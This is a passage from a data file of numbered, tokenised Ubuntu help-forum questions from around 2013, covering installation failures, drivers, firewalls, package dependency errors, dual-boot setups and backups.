i am running out of options here . it 's not so bad , but quite annoying during the evening when i want to turn the brightness down . anybody know how to fix this ?
338808	issues with shorewall	i 'm new to using ubuntu os and its interface and using terminal . recently i was trying to deploy squid , and shorewall firewall . even though shorewall is running i ca n't get through one command , i.e . shorewall show connections root @ hassaan-optiplex-gx620 : /usr/share/shorewall # shorewall show connections shorewall 4.5.5.3 connections ( 5 out of 63584 ) at hassaan-optiplex-gx620 - thu aug 29 14:33:36 pkt 2013 grep : /proc/net/nf_conntrack : no such file or directory '' i get this message . please help me with this problem . by the way i am using this tutorial .
338809	upgrade of ubuntu 64-bit 12.10 & clean install of 64-bit 13.04 hangs	i have a 64bit desktop with windows 7 . on one disk ( not the windows 7 system disk ) i created an extra empty partition . the disk now has 2 partitions : one with ntfs and one ( to be ) used for ubuntu . installation of ubuntu 32 bit 12.04 , and subsequent upgrade to 12.10 and clean install of 13.04 all are fine . clean installation of ubuntu 64-bit 12.04 goes fine , then upgrade to 12.10 ( obviously also 64-bit ) hangs . clean installation of ubuntu 64-bit 13.04 hangs . after i choose the delete everything and do a complete installation option . did not get the timezone or username/machine name questions . did again a clean installation of ubuntu 32-bit 13.04 works perfectly . additional info : mother board : asustek m5a78l/usb3 with 4 amd64 processors bios updated to latest version from asus website display adaptor : ati radeon hd 5400 series after the bios update : warmboot at the end of the install when ubuntu tries to boot from disk the first time : the system simply hangs . coldboot , after power down/up , looks like the boot is getting further . i now get run-init : /sbin/init exec format error [ 4.562689 ] kernel panic -not syncing . attempt to kill init ! exit code=0x0000100 [ 4.562689 ] and then things come to a halt . again windows 7 64-bit boots fine , ubuntu 13.04 32-bit boots fine . i would like to know how to progress .
338812	flashplayer security doubts	i am an ubuntu newbie and i installed ubuntu desktop 12.04 , 64 bit . as i noticed the firefox is the actual version , but the adobe flashplayer was the 11.2 version which has , i guess , some security problems ? i was connected to the internet for several days before i noticed that the flashplayer is 11.2 . my question is - is there any chance of my pc being infected now ? can bios be infected , or if i format the hd and install ubuntu again everything will be fine ?
338814	why ca n't i log in after upgrading to 13.04 ?	i 've just upgraded my system from 12.04 to 13.04 . however , after typing in my login credentials the screen goes black for approx . 1 sec . and then the login screen reappears , asking me again for the password . the password is the one i used also for the 12.04 version and the system seems to accept it . when i type in a wrong password on purpose the system notifies me in red letters that incorrect details were entered , which in turn is not the case when using the correct password . however , it then always keeps falling back to the login screen asking me again for the password . does anybody have an idea what could be wrong here ?
338817	searching for a drawing applet to use in mediawiki ?	i am searching for a drawing applet which i can use in my mediawiki ( v. 1.21.1 newest stable ) . for now i found 2 extensions . ( i am using ubuntu 12.04 server and the common php mediawiki ) anywikidraw svgedit i made svgedit run on my wiki , but it is not working well , and not good to use . anywikidraw is not supported for my verison . so are there any other drawing tools which i can use in my wiki ? i want to draw something into an existing picture ( jpg jped png whatever ) and directly save it ! i do n't want to download a picture first and then paint it an reupload . if anyone finds a working solution i will upvote and accept immediately . thank you in advance .
338818	install mysql 32 bit on 64 bit server	i have an application witch requires mysqlclient 32 bit library . the application is running on a 64 bit how can i install the 32 bit libraries keeping the 64 bit functionality in the same time ?
338824	where are these missing options in menuconfig ?	i 'm following `` how to assign devices with vt-d in kvm '' and am trying to modify the kernel config as it suggests . but after going to /usr/src/linux-headers-3.x.x-x and running make menuconfig i ca n't find the following options : '' bus options ( pci etc . ) '' - > `` **support for dma remapping devices** '' '' bus options ( pci etc . ) '' - > `` **enable dma remapping devices** '' '' bus options ( pci etc . ) '' - > `` **pci stub driver** '' they 're just missing in menu options . where can i find them ? where to find config_x86 || config_ia64_generic ?
338826	external hdd in raw formatted . will ubuntu be able to access the device and use/recover my data	i have an external hdd , which somehow is now in raw format , but i need the data off it . will ubuntu allow me to view the files stored on it and also copy them to a new hdd ?
338828	how do you install a `` device manager '' on ubuntu ?	i want to check which drivers are running on my ubuntu 12.04 laptop . so i tried to install device manager . i typed sudo apt-get install gnome-device-manager but it returned a gnome-device-manager not found so can anyone tell me how to install a device manager ?
338829	why does n't available space increase if i grow my virtual hard drive ?	i have increased my ubuntu 's hard disk size to 40gb . but still i do n't see it 's increased ! i increased it through vm → settings → hard disk ( scsi ) → utilities → expand . when i power on and and see in terminal , it shows only 7.7gb free . i want to install some more size db servers . due to this , i am unable to do anything on it .
338833	opening windows files with wine	i can access my windows files while running ubuntu , but can i run for example skype via wine without installing it on ubuntu ? my idea it 's just simply run programs , which had been already installed on windows but are n't installed on linux , using wine . is that possible or i must install those programs on linux too in order to they run correctly ?
338834	why 's wine giving this error message after update	after update in ubuntu 12.1 , wine started to give me an error for a program : p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory err : ole : cogetclassobject class { 00000507-0000-0010-8000-00aa006d2ea4 } not registered err : ole : create_server class { 00000507-0000-0010-8000-00aa006d2ea4 } not registered err : ole : cogetclassobject no class object { 00000507-0000-0010-8000-00aa006d2ea4 } could be created for context 0x5 wine : unhandled exception 0x0eedfade at address 0x0000:0x7b839d82 ( thread 002d ) , starting debugger ... err : seh : setup_exception_record stack overflow 928 bytes in thread 002d eip 7bc789e2 esp 00230f90 stack 0x230000-0x231000-0x330000 updated wine : now the error is err : ole : cogetclassobject class { 00000507-0000-0010-8000-00aa006d2ea4 } not registered err : ole : create_server class { 00000507-0000-0010-8000-00aa006d2ea4 } not registered err : ole : cogetclassobject no class object { 00000507-0000-0010-8000-00aa006d2ea4 } could be created for context 0x5 wine : unhandled exception 0x0eedfade in thread 37 at address 0x9f1e0b22:0x7b83bbd5 ( thread 0037 ) , starting debugger ... err : seh : setup_exception_record stack overflow 908 bytes in thread 0037 eip f7562a27 esp 00230fa4 stack 0x230000-0x231000-0x330000
338835	is it possible to get oracle sqldeveloper use connect-proxy	i connect to my office network via citrix . connecting to terminals is achieved by connect-proxy command . for web browsers i use foxy proxy however , i am not able to use anything for oracle sqldeveloper . any idea if we can get sqldeveloper to use connect-proxy or atleast get past proxy ?
338840	the external gateway on router in openstack grizzly all in one on virtual box is down what i should do ?	i have installed openstack grizzly all in one node on a virtual box and every thing seemed to be fine until i created external network and add gateway from the router to it but the it is down what make the instances ca n't reach internet and ca n't load to get the metadata and freezes on loading ? what i should do any tips ? ? ? does the problem related to that i deploying every thing on a virtual box but iam making all networks bridged ? ?
338841	configure '50-synaptics.conf ' for kinetic scrolling ?	my laptop has a synaptics touchpad with multi-touch support . kinetic two-finger scrolling works fine on windows , how can i get it to work on ubuntu ? i have already reversed the scrolling direction by editing the /usr/share/xorg.conf.d/50-synaptics.conf , all i need now is to give it some inertia . i am using the 32 bit version of ubuntu 12.04 lts this link explains a lot about the different parameters , but i ca n't seem to find the right parameters to set in order to achieve this . please do not answer unless you have tried this before . thank you : )
338842	how to know what version of php is shipped in a release version ?	is there a page or wiki listing for each ubuntu release what is the default associated php version ? 10.04 lts = > php 5.3.2 and so on ...
338849	making changes to a locale setting and notifying upstream	there are two errors in the locale settings for en-ca . the first is paper . although we use metric for just about everything ( distance , temperature , and measurements ) , we use american paper sizes ( 8-1/2 x 11 , 11 x 14 , and 11 x 17 ) . by default , the locale settings in linux for en-ca assume metric paper , so that every individual program needs to have the default paper sizes manually adjusted . this is annoying . the second is currency format , which is currently set as $ 20457.99 . the correct format is $ 20,457.99 . i have n't tested fr-ca , but i am suspecting similar issues . they also use american paper size by default and their currency format is 20 457,99 $ . two questions : 1 . how can i change these two items on my installation ? i have ubuntu 12.04 desktop amd64 installed . 2 . how do i go about proposing a change so that this can be incorporated into the core linux product ? i 'm just an end-user , but this might be a small contribution . thanks ,
338853	how can i install broadcom drivers on ubuntu ?	this is my first time installing an ubuntu system onto my laptop which is a dell inspiron 6400 . it used to run windows xp , and when installing ubuntu it said that the wired network was detected and was able to install new updates needed for the system . whenever the system was installed and i tried to connect to the internet i could n't . i do n't think i have a broadcom driver installed , and i have tried to install it but i get confused on bad tutorials on youtube . can anyone give me step by step instructions of how to get the drivers from my other computer which has wireless access and put them on my inspiron and what to do from there . output of lspci : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) output of sudo lshw -c network : *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:16 memory : efdfc000-efdfffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : ef9fe000-ef9fffff
338857	automatically enter input in command line	i 'm running a script that it requests entering 'y ' on each operation , i am looking for a solution like $ ./script < echo 'yyyyyyyyyyyyyy ' to pass all my inputs in one time .
338864	what is the path and command of mounted folder when i `` connect to server '' ?	i am trying mount a remote machine filesystem to my local machine . the remote machine is a computation cluster which has two file systems . i have space on both file systems and i have a link on my home directory to the other nfs ( fastspace ) . when i mount my home directory on the remote machine locally sshfs remote : ~/mnt/remote i can access the files but not fastspace . if i try to do as much as ls in the directory i get ls : can not open directory . : input/output error same goes when i try to sshfs remote : fastspace ~/mnt/remote however , if i try to directly mount my space on fastspace things seem ok . when i try to mount the remote file system using gnome connect to server , everything is fine . so , i need either the command gnome use to connect to server or to know the path . how can you help me ?
338866	how to install multiple ubuntu operating systems with shared boot partition	i have a computer ( laptop ) and a hard disk to which i have already created partitions for my operating systems and a boot partition , which has grub2 and the /boot files . what is the proper way to install multiple ubuntu operating systems and update grub2 to allow me to select which os to boot ? ( in my case , the ubuntu 13.04 desktop and a minimal server install )
338869	error while downloading https files using wget	if i try to download the some http files , then wget works just fine ( eg : wget download_link ) . but when i try to download https files using wget then i 'm getting the following error http request sent 403 forbidden my problem is , i ca n't download http files in my college wifi . so when i try to download the file , wget will send the http request to the server . eventually , download will be blocked . to download the https file , i 've used the following command wget https : //download_link how to download https files ( username and password is there in the download link too ) are there any extra options needed with wget ? update : initially wget does not support the https downloads in some destribution . we need to compile the source code manually using openssl . after that we can do https downloads link to compile the wget using openssl : how to compile the wget source code
338872	how to change desktop password ?	i am using ubuntu 12.04 . i can not change my desktop password . can somebody help me on how to change the desktop password ?
338877	how to resolve display errors toshiba l875 ?	i have a toshiba l875 , amd , with radeon graphics card . win8 was pre-installed . there are two problems but i believe one underlying cause . problem : the first is that the display has random gray artifacts . grey boxes or what look like grey shards of broken glass , randomly appear on screen . triggering a refresh ( resize or move a window ) usually removes the artifacts , though they reappear . how i 've tried to fix it : have verified that open source radeon drivers are in use ( settings > software & updates > additional drivers ) have added proprietary ati drivers ( same as above ) have added ati catalyst center added latest kernel , 3.10 installed various distros : mint , ubuntu 13.04 , 12.04 lts , lubuntu , all ubuntu derivatives removed compiz . that was a mistake : ) each of these attempts are separate , not cumulative . adding/changing drivers either had no effect on the problem or , in the case of the proprietary drivers , i had to reinstall ubuntu , as a reboot ended with a black screen and blinking white cursor that accepted no commands . i attempted to remove/change compiz because most ubuntu reported errors listed /usr/bin/compiz as the location . problem 2 : oh , and my ultimate goal is to get dual monitors working . any attempts to plug-in a vga monitor blank the laptop monitor or freeze it . currently : my attempts are more whack-a-mole than systematic and probably incorrect in some way , but i am not sure what else to do : it seems a video problem . a fresh install awaits at home , so the default video drivers and kernel are no longer in-play . however , i believe what fixes one problem will fix the other . i 've learned a lot over the 25 or so hours spent researching and trying to resolve the video problem , but i need it to work now . before i jumped , i used a vm for about a month and set-up a bitnami wordpress stack as a very good onenote replacement . so , i checked workflow . and , i could be wrong , but was sure dual monitors worked when i ran the livedvd to test for hardware support . anyway , like the ham & egg breakfast story that explains the difference between involved and committed ( the chicken is involved , the pig committed ) , i removed win 8 and went all-in . so , i am committed . thanks for any support , i appreciate the time of those in the forum .
338888	how to speed up the wifi connection process using command line tools ?	i want to develop a script which connects frequently and automatically to open wifi networks . i am using the nmcli tool , which seems to be stable . nmcli device wifi connect `` $ ssid '' iface `` $ iface '' -- timeout 20 however , the timeout exception is thrown quite often . this tool does not provide any information but the exceeding of the timeout . is there some kind of verbose mode , which would tell me precisely , how long every part of the connection process ( say dhcp etc ... ) does take ? furthermore i see differences in the duration of the connection process between my build-in and an usb wifi interface ( second needs longer ) . is this a driver issue which i can not optimize or might there a chance to speed things up ?
338892	how do i change the keyboard shortcut of 'system activity ' ? ( 12.04 )	its a simple one : i want to change the keyboard shortcut of the 'system activity ' from 'conrtol + escape ' to something else , possibly eliminating the keyboard shortcut altogether ( i have other means of handling gone-wild processes ... : - ) . i 've found nothing relevant in system settings - > shortcuts and gestures . i 've seen several similar posts on the subject but none was describing my options exactly and therefore none was suitable/working for me . thanks !
338894	how to disable the efi check in 13.04 x64 ?	i have a lenovo b575 laptop and the bios presents itself as efi-capable to the 13.04 x64 installer but the laptop will only function as legacy . ther are no bios/firmware options to toggle/change so i am stuck with this situation and can not install any os that does and efi check ; however , i was able to install windows 8.1 by removing the efi folder and efibootmanager files from the installation disk and it worked perfectly . i know this is clearly a bios issue ; however , i have been unable to convince lenovo to issue a bios updates that unlocks the efi capabilities . the laptop came with win 7 installed and , since that does not do an efi check , a legacy reinstall works perfectly . fyi , here are some of my previous installation test results with x64 installations : windows 7 sp1 - no efi check , installation ok. windows 8.0 - efi check , installation fails . windows 8.1 - efi check , installation fails . windows 8.1 ( modified ) - removed efi check , installation ok. zorn 7.0 - installation ok ( apparently no efi check ? ) so , is there any way the efi check can be disabled so i can install 13.04 x64 as legacy ? thanks for your help !
338899	why does chkconfig highlight the word `` on '' by default in precise ?	why does chkconfig highlight the word `` on '' by default in ubuntu precise ?
338903	how can i disable screen blanking without /etc /x11/xorg.conf on nvidia optimus laptop	i 'm running ubuntu 12.04 , 64 bit , kernel linux 3.5.0-39-generic , on a system that has an nvidia ge force gt 640m / intel hd graphics 4000 - 1.0 gb graphics processor assembly . in order to get the unity 3d desktop features to work correctly i needed to install bumblebee . the problem this has created is that in order for the desktop effects to work with optimus laptops you must remove /etc/x11/xorg.conf . if using an optimus laptop unity 3d will not work until this file is removed after this file has been removed if you replace it the desktop will load into a black screen . the reason i want this file is because without it 's having a server layout section containing option `` blanktime '' `` 0 '' , option `` standbytime '' `` 0 '' , option `` suspendtime '' `` 0 '' , option `` offtime '' `` 0 '' my desktop goes blank every 10 minutes this is very frustrating when attempting to intake media . this is the relevant data from xset -q screen saver : prefer blanking : yes allow exposures : yes timeout : 600 cycle : 600 dpms ( energy star ) : standby : 0 suspend : 0 off : 0 dpms is enabled if anyone would present me with a solution to this that does n't involve something as inelegant as installing caffeine or writing a script to move the cursor every so often . my satisfaction would be great .
338906	scanner works with xsane , but not with scanimage	i have the following problem with my hp lj m1217 mfp device . printing works ok , but with scanning i have a small ( ? ) problem . when scanning with adf , it works good ( only i have to specify -y 296 , because otherwise the file length is worng ) , but when scanning from flatbed ( -- source flatbed ) the scanner works always with 75 dpi , although i specify -- resolution . interesting is , that the same scanner works with xsane ... and , my hp1220 works good with the same command line ( scanimage ) . it would be a great help , when i could get the command line of xsane : there must be some difference from mine . where is the log , or how the get the generated command line from the program ? or other idee , what can be wrong ? the scanner / printer is installed with hp-setup , my system is ubuntu 10.04 . command line : scanimage -d hpaio : /net/hp_laserjet_professional_m1217nfw_mfp ? ip=192.168.0.101 -- resolution=100 -v -p -- mode=gray -- source=flatbed -l 0 -t 0 -x 215 -y 296 > flat.pnm the result is 75 dpi .
338907	how to install cuda 5.5 under ubuntu 12.04 lts 64-bit ?	how to install cuda 5.5 under ubuntu 12.04 lts 64-bit ?
338912	audio not working on sony vaio pro 13 . hda intel pch . ubuntu 12.04	i 've tried unmuting alsamixer , updating alsa , and force stopping pulseaudio . so far i ca n't figure it out . ~ $ lspci -nn|egrep 'ultimedia|udio|sound|ac97|ac97|emu' 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 )
338915	key import with apt-add-repository and own repository possible ?	is it possible to use the public-gpg-key import feature of apt-add-repository with my own reprepro repository ? is there e.g . something like a default key server where apt-add-repository expects to find the keys or a path within the ( http ) repository where it will look for it ?
338920	how to change from a 32-bit installation to a 64-bit one ?	ok , i feel stupid . full disclosure , brand new to ubuntu . i have a five year old xp laptop that i assumed was a 32 bit os and thus , i installed the 32 bit version of ububntu 13.0.4 . i now see under `` about this computer '' that it is , in fact , 64 bit . can i install the 64 bit version over top of the 32 bit version , or do i have to remove the current version first ? thankfully , i have n't loaded the thing with apps and personal files and i discovered this issue pretty much out of the box . i assume that something like this will overwrite and wipe out any current files and settings . yeah , i do feel pretty stupid .
338921	what happen when ubuntu is repeatedly shutdown and restarted ?	i recently installed ubuntu 12.04 lts on my system dual boot with xp . my computer teacher at school used to tell that if a linux system is shutdown repeatedly it corrupts . i wanted to know that does same thing happen when it is done in ubuntu . thank you .
338924	installed ubuntu , unable to open windows 8	i got bored with the windows 8 and tried installing ubuntu 12.04 lts . i had trouble installing it and looked for help . i learnt that i had to make the root as `` / '' and format the drive as ext 2 or 3 or 4 . now that i have installed my ubuntu , i ca n't multi-boot into windows 8 . so i decided to open disk utility . this showed that the major part of my hdd was in the ext2 type , i reformatted that partition to ntfs ( as i wanted to format windows 8 ) . still no change - `` windows needs a missing partition '' i put in the win 8 installation disc , but i can not see my hdd . i just want to make the windows partition visible , and reinstall windows 8 in that . i do n't have access to internet on ubuntu as i ca n't install my wireless modem .
338937	how to use rsync via ssh with rsa key passphrases ?	how can i use rsync with passphrases ? all googled `` solutions '' i found use passphrase-less keys which seems no real option . i am runnning 2 ubuntu servers 12.04.2 lts .
338944	install windows 8 and ubuntu 13.04 using uefi boot and third boot as backtrack 5r3 and grub to select os at startup	i have hp g6 pavilion laptop ... and i have install windows 8 using uefi boot and ubuntu 13.04 too using uefi boot too.. while installing ubuntu it did n't detect windows 8 ... so i installed it it doing manual partitions..it installed successfully.. then i installed backtrack 5r3 using normal legacy boot as it does not support efi boot.. it detected ubuntu os..but then too i preferred installing it doing manual partitions..it too installed properly ... now coming to the issue im facing is that when i start my laptop windows 8 boot directly and i dont get boot menu to choose.. i had intalled grub while installing ubuntu and backtrack to my windows partition.. i also tried easy bcd for boot menu but it do n't works and windows 8 loads directly . but i can start ubuntu from bios from efi boot options..as i see there ubuntu os efi file there . but i want a boot menu or grub to select os among the 3 i have install on different partions.. plz also help me to start backtrack ... thankya in advance
338957	what is the correct driver to use for a samsung clp365w printer ?	i can not get my new samsung clp365w printer to print via either wired ( usb printer cable ) or wireless . wireless printing works in 'doze vista . i have tried installing the drivers ubuntu recommended for it from the driver database . when i did this and tried to print a test page , it said it was doing , the printer status said `` processing-connected to printer '' and then changed back to `` idle '' without printing anything out . i have just carried out a version of the driver installing instructions from the samsung website and done something in the terminal about sudo ./install.sh , after moving the files into the home folder . install got as far as the following error message : ./noarch/worker.sh : 310 : ./noarch/worker.sh : illegal number : 09 **** install finished what does that mean please ?
338961	ca n't install php5-fpm after upgrade to 12.10	i upgraded to 12.10 from 12.04 and began getting gateway errors when i accessed phppgadmin via nginx . after looking around i realised that the required program php5-fpm was n't running and further what appeared to be the required executable /usr/sbin/php5-fpm had disappeared . when i try to re-install it , it gives : package php5-fpm is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'php5-fpm ' has no installation candidate the only uncommented lines from sources.list were : deb http : //extras.ubuntu.com/ubuntu quantal main # third party developers repository deb http : //archive.ubuntu.com/ubuntu quantal main aptitude search php5-fpm gave this : c php5-fpm - server-side , html-embedded scripting language ( fpm-cgi binary ) however , i would note that several lines were emitted , perhaps without a line feed to the terminal which i was unable to redirect to a place where i could read them . the question is : if aptitude is able to find this package via aptitude search what about that package disqualifies it for installation on this system ? how to find the correct source for the package ?
338965	how to install latest version of cheese from source in raring ?	the source files can be downloaded from here . i want to use the last stable version . how to install cheese from source ? or is there any .deb file of version 3.8.3 available somewhere ?
338968	ubuntu-12.04.3-desktop-amd64.iso installing using pendrive	i recently downloaded , ubuntu-12.04.3-desktop-amd64 . i am trying to install it using software from pendrivelinux.com . however , this version is yet not listed and when i create live usb using any other version , it does not work . is there any other way to create a live usb ?
338970	is there any ubuntu 12.04-compatible , open-source 3d modeling software capable of creating a 2d cross-section ?	i 've heard that blender 's boolean algorithm might do the trick , but was wondering if a cad software had this functionality . would want an end result similar to a stratigraphic cross-section .
338978	ubuntu 13.04 completely frozen	i currently use ubuntu 13.04 on lg x110 notebook after last updating ( on 28th august 2013 ) software does n't work . it suddenly stops while i 'm using it . hardware still runs : i know because of the noise , but noise it has during doing no operation . software does n't work at all : desktop is frozen , mouse is blocked , any keyboard command gives no result . i already uninstalled xubuntu , in case there was some bug with it , but it just does n't matter . any suggestion ?
338982	can someone tell me what this means and how do i fix it ?	all i wanted to do was put vlc on my computer . this is turning into a real pain in the butt . i had to update and upgrade just to get the software centre to run , but when i try to install vlc i get the following . when i try to install anything actually i get the package dependency error message ... . here is my deal , this is a brand new computer , straight out of the box , ubuntu is not at all user friendly and when i ask people for help they want to try to show how smart they are by talking computer geek language . if the system had better help from people then maybe we wouldnt all be wishing it was windows easy . please help me with this , and please speak in a language that a novice beginner ubuntu user can understand . thanks in advance guys . the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8+git20130825+r612-0~r43~precise1 ) but it is not going to be installed depends : libavcodec53 ( > = 4:0.8-1~ ) but it is not going to be installed or libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not installable depends : libva1 ( > 1.0.15~ ) but it is not installable recommends : vlc-plugin-notify ( = 2.0.8+git20130825+r612-0~r43~precise1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.8+git20130825+r612-0~r43~precise1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . then ; i tried to use the movie player that came with ubuntu and it said that it had to search for codecs or something , it searched found what it needed to play the movie i hit install button and it came up with this error ; gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.4 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.6ubuntu0.12.04.1 is to be installed i use my computer for two things , watching movies and writing in libre office . im getting a lot of writing done which is good but only because i cant watch anything . please once again help me , thank you . denny update : tried to install synaptic , got this : dennis @ dennis-x201ep : ~ $ sudo apt-get install synaptic [ sudo ] password for dennis : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : synaptic : depends : libept1.4.12 but it is not installable recommends : rarian-compat but it is not installable e : unable to correct problems , you have held broken packages . tried to install vlc again and got this : dennis @ dennis-x201ep : ~ $ sudo apt-get install vlc [ sudo ] password for dennis : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8+git20130825+r612-0~r43~precise1 ) but it is not going to be installed depends : libavcodec53 ( > = 4:0.8-1~ ) but it is not going to be installed or libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not installable depends : libva1 ( > 1.0.15~ ) but it is not installable recommends : vlc-plugin-notify ( = 2.0.8+git20130825+r612-0~r43~precise1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.8+git20130825+r612-0~r43~precise1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . thanks for the help though , ( and for the edit mr. castro ) .
338989	how do i build a boot disk !	i 've used ubuntu a few years ago and got a error regarding a password . i never had a password for this computer , but it really said i did and i tried and tried to get it corrected ... . i finally gave up i bought the last 64 bit cd -- and when i pulled it out , it had a sractch on it ... i do n't want to buy another . i 've downloaded the iso file ! i unzipped it and burned it to a dvd but i ca n't get it to boot the computer ? ? ? what am i doing wrong ? this is the third time i 've burned it ! i need help aj
338990	want to remove windows 7 and retain ubuntu istallation	i installed ubuntu and currently my laptop is dual boot ( win7/ubuntu ) . but now i want to remove win7 retaining my ubuntu installations ( software ) i do n't want to install ubuntu with live cd . please suggest some other method if you know one . update based on op 's comments sudo cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=384594f2-ff10-499a-9ae6-2f85f6feeeaa / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=89a95801-318a-4d25-a0d9-76aceb07508b none swap sw 0 0 output of mount shubh10 @ shubh10-aspire-5349 : ~ $ mount /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/shubh10/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=shubh10 )
338992	safe to exclude ~/.local/share/zeitgeist in a home folder backup ?	ubuntu 13.04 . i am configuring a home folder backup using ubuntu 's built-in backup function and ubuntu one as the destination . my home folder is fairly large , and i 'm looking for folders that i can exclude without too much of a deleterious effect . that said : as i understand , zeitgeist is an activity logger - it has a folder at ~/.local/share/zeitgeist which is large ( ~1.1 gb ) . what would the effects of not backing this folder up and having to run a restore later ? would they ever possibly include being unable to use my data ? for the curious , the other folders i am considering excluding are : ~/trash ( default ) ~/downloads ( default ) ~/eclipse-kepler ( binary package only ) ~/.wine ( losing this would not hurt my feelings at all ) ~/.cache
